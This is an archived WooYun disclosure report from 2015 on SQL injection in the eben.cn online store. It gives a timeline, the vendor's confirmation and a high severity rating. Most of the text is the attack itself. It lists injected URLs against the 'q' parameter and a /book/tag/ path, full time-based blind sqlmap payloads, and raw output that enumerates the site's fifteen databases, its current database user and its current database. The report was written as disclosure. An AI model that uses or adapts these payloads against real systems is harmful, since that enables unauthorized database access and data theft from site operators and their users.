乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-06: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经确认,细节仅向厂商公开 2015-07-17: 细节向核心白帽子及相关领域专家公开 2015-07-27: 细节向普通白帽子公开 2015-08-06: 细节向实习白帽子公开 2015-08-21: 细节向公众公开
天地本不仁 万物为刍狗【HD】 以团队之名 以个人之荣耀 共建网络安全
http://store.eben.cn:80/book/tag/500-1'%20OR%203*2*1%3d6%20AND%20000156%3d000156%20--%20
看了下权限
还有 我想说下 怎么 q 参数到哪都是注入啊···上一个漏洞我只说了4处 但是不止4处 全是q 参数 注入 这里又有········
http://store.eben.cn:80/precinct/84?q=-1http://store.eben.cn:80/magazine/search/?q=-1http://store.eben.cn:80/precinct/1?q=-1http://store.eben.cn:80/precinct/85?q=-1http://store.eben.cn:80/precinct/86?q=-1http://store.eben.cn:80/precinct/87?q=-1
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 106 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://store.eben.cn:80/precinct/84?q=-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))IopG)-- XyPQ21=6 AND 000633=000633 or 'N75PGnje'='---[14:19:11] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[14:19:11] [INFO] fetching database names[14:19:11] [INFO] fetching number of databases[14:19:11] [INFO] retrieved:[14:19:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y1[14:19:39] [INFO] adjusting time delay to 2 seconds due to good response times5[14:19:41] [INFO] retrieved: information_schema[14:23:03] [INFO] retrieved: admin[14:23:58] [INFO] retrieved: cann[14:24:47] [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large')[14:24:47] [WARNING] turning off page compression[14:24:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[14:24:52] [ERROR] invalid character detected. retrying..[14:24:52] [WARNING] increasing time delay to 3 secondsa[14:25:04] [INFO] retrieved: cms[14:25:50] [INFO] retrieved: count[14:27:16] [INFO] retrieved: discuz[14:28:51] [INFO] retrieved: dz[14:29:28] [INFO] retrieved: eben_store[14:32:05] [INFO] retrieved: ebencms[14:33:46] [INFO] retrieved: ecshop[14:35:28] [INFO] retrieved: gateway[14:37:11] [INFO] retrieved: oauth_db[14:39:19] [INFO] retrieved: passport[14:41:38] [INFO] retrieved: ucenter[14:43:28] [INFO] retrieved: uchomeavailable databases [15]:[*] `count`[*] admin[*] canna[*] cms[*] discuz[*] dz[*] eben_store[*] ebencms[*] ecshop[*] gateway[*] information_schema[*] oauth_db[*] passport[*] ucenter[*] uchome[14:45:03] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[14:45:03] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'[*] shutting down at 14:45:03
其他的你就自己查吧
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 107 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://store.eben.cn:80/book/tag/500-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ebnB)-- BUhJ21=6 AND 000156=000156 -----[14:19:08] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[14:19:08] [INFO] fetching database names[14:19:08] [INFO] fetching number of databases[14:19:08] [INFO] retrieved:[14:19:08] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[14:19:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[14:19:08] [ERROR] unable to retrieve the number of databases[14:19:08] [INFO] falling back to current database[14:19:08] [INFO] fetching current database[14:19:08] [INFO] retrieved:do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[14:19:46] [INFO] adjusting time delay to 4 seconds due to good response timeseben_storeavailable databases [1]:[*] eben_store[14:25:58] [WARNING] HTTP error codes detected during run:404 (Not Found) - 19 times[14:25:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'[*] shutting down at 14:25:58
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://store.eben.cn:80/book/tag/500-1' OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ebnB)-- BUhJ21=6 AND 000156=000156 -----[14:26:34] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[14:26:34] [INFO] fetching current user[14:26:34] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[14:27:12] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[14:27:35] [INFO] adjusting time delay to 3 seconds due to good response times[email protected]/255.255.255.0current user: '[email protected]/255.255.255.0'[14:45:30] [INFO] fetching current database[14:45:30] [INFO] resumed: eben_storecurrent database: 'eben_store'[14:45:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\store.eben.cn'[*] shutting down at 14:45:30
有礼物不?
危害等级:高
漏洞Rank:15
确认时间:2015-07-07 13:44
我们会继续努力提高安全等级
暂无